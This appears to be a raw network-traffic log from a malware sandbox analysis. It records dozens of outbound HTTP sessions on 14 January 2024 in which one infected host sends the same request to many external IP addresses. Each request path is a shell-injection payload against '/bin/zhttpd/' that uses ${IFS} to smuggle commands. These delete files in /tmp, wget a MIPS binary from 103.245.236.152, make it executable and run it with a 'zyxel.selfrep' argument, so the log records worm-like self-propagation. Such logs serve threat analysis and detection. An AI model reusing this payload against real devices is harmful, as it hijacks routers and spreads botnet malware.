                                            Jan 14, 2024 15:50:38.403304100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4143192.168.2.2346082160.123.36.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403326035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4144192.168.2.234024884.230.108.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403357983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4145192.168.2.2358590222.31.6.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403362989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4146192.168.2.2344142137.111.245.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403389931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4147192.168.2.233891618.219.168.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403419018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4148192.168.2.23603784.188.59.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403445005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4149192.168.2.2355810117.59.208.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403482914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4150192.168.2.2348706137.13.176.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403517008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4151192.168.2.2349322210.0.23.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403567076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4152192.168.2.2355826163.84.195.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403599024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4153192.168.2.2343060218.74.56.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403611898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4154192.168.2.2342684125.27.147.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403645039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4155192.168.2.2346088169.35.234.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403649092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4156192.168.2.234538436.133.168.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403657913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4157192.168.2.2354300141.204.213.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403664112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4158192.168.2.235124893.211.137.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403682947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4159192.168.2.235537060.198.104.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403750896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4160192.168.2.233856447.176.251.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403772116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4161192.168.2.2358284112.75.110.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403821945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4162192.168.2.234116840.165.157.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403851032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4163192.168.2.235363041.222.144.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403872967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4164192.168.2.234779038.130.176.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403904915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4165192.168.2.2356356175.182.229.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403948069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4166192.168.2.2338046152.64.254.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.403985977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4167192.168.2.235730243.45.174.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404014111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4168192.168.2.2357696140.32.31.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404028893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4169192.168.2.2360524203.69.39.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404045105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4170192.168.2.2352888110.180.151.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404062033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4171192.168.2.2345988176.157.160.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404081106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4172192.168.2.2338314212.43.151.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404092073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4173192.168.2.2340568181.123.138.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404145002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4174192.168.2.2333202128.178.156.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404181957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4175192.168.2.2340002193.34.57.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404213905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4176192.168.2.234944453.36.93.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404241085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4177192.168.2.2359126179.140.96.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404264927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4178192.168.2.2345380217.5.209.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404299021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4179192.168.2.234522041.92.220.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404320002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4180192.168.2.235018271.180.187.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404340029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4181192.168.2.2337774149.104.205.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404382944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4182192.168.2.2358844131.82.244.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404422998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4183192.168.2.2336594185.26.74.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404454947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4184192.168.2.2341202216.120.217.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404464960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4185192.168.2.235735218.28.122.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404511929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4186192.168.2.234818225.140.90.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404527903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4187192.168.2.2353034103.24.152.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404547930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4188192.168.2.2351908137.152.157.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404582024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4189192.168.2.2340482135.187.10.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404597998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4190192.168.2.2334940222.7.229.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404622078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4191192.168.2.2359852108.224.99.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404678106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4192192.168.2.235324083.158.161.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404706001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4193192.168.2.234692093.8.52.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404731989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4194192.168.2.23441748.44.146.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404757023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4195192.168.2.2345956204.159.59.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404781103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4196192.168.2.2356254117.184.165.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.404808044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4197192.168.2.233566820.164.59.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411851883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4198192.168.2.2333694204.129.140.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411892891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4199192.168.2.234611038.35.217.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411906004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4200192.168.2.235199667.244.132.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411933899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4201192.168.2.2354578135.130.211.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411968946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4202192.168.2.234326494.233.42.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.411982059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4203192.168.2.2360090200.161.237.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412028074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4204192.168.2.235957063.132.28.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412059069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4205192.168.2.2356660149.173.158.13443
                                            TimestampBytes transferredDirectionData
